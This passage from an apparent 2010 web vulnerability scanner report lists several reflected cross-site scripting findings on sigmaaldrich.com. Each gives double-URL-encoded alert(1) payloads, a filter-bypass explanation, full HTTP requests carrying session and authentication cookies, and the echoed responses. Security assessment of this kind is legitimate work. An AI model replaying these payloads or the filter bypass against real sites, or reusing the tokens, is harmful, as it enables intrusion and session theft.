The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fa38%2522%253balert%25281%2529%252f%252fe4a284d9a4d was submitted in the REST URL parameter 1. This input was echoed as 3fa38";alert(1)//e4a284d9a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc3fa38%2522%253balert%25281%2529%252f%252fe4a284d9a4d/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:10 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc3fa38";alert(1)//e4a284d9a4d/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.434. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5a9e%2522%253balert%25281%2529%252f%252f0ee5c7d588d was submitted in the REST URL parameter 2. This input was echoed as b5a9e";alert(1)//0ee5c7d588d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibb5a9e%2522%253balert%25281%2529%252f%252f0ee5c7d588d/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:12 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibb5a9e";alert(1)//0ee5c7d588d/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.435. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6515%2522%253balert%25281%2529%252f%252fa34d166ad3e was submitted in the REST URL parameter 3. This input was echoed as d6515";alert(1)//a34d166ad3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichd6515%2522%253balert%25281%2529%252f%252fa34d166ad3e/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:16 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichd6515";alert(1)//a34d166ad3e/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.436. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7683b%2522%253balert%25281%2529%252f%252f0f50d21c736 was submitted in the REST URL parameter 4. This input was echoed as 7683b";alert(1)//0f50d21c736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers7683b%2522%253balert%25281%2529%252f%252f0f50d21c736/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:19 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers7683b";alert(1)//0f50d21c736/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.437. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e4ca%2522%253balert%25281%2529%252f%252f6dca93d3432 was submitted in the REST URL parameter 5. This input was echoed as 6e4ca";alert(1)//6dca93d3432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-and6e4ca%2522%253balert%25281%2529%252f%252f6dca93d3432/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:21 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-and6e4ca";alert(1)//6dca93d3432/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.438. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fede1%2522%253balert%25281%2529%252f%252f4fb6dc7d47d was submitted in the REST URL parameter 6. This input was echoed as fede1";alert(1)//4fb6dc7d47d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-and/fede1%2522%253balert%25281%2529%252f%252f4fb6dc7d47d/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:24 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28970


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-and/fede1";alert(1)//4fb6dc7d47d/event-min.js","E404") ;
   </script>
...[SNIP]...

1.439. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/icon-literature [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/icon-literature

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d92%2522%253balert%25281%2529%252f%252fc414cbb18ad was submitted in the REST URL parameter 1. This input was echoed as e0d92";alert(1)//c414cbb18ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etce0d92%2522%253balert%25281%2529%252f%252fc414cbb18ad/medialib/sigma-aldrich/icon-literature HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:44 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etce0d92";alert(1)//c414cbb18ad/medialib/sigma-aldrich/icon-literature","E404") ;
   </script>
...[SNIP]...

1.440. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/icon-literature [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/icon-literature

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e58%2522%253balert%25281%2529%252f%252f3437fea45bd was submitted in the REST URL parameter 2. This input was echoed as 91e58";alert(1)//3437fea45bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

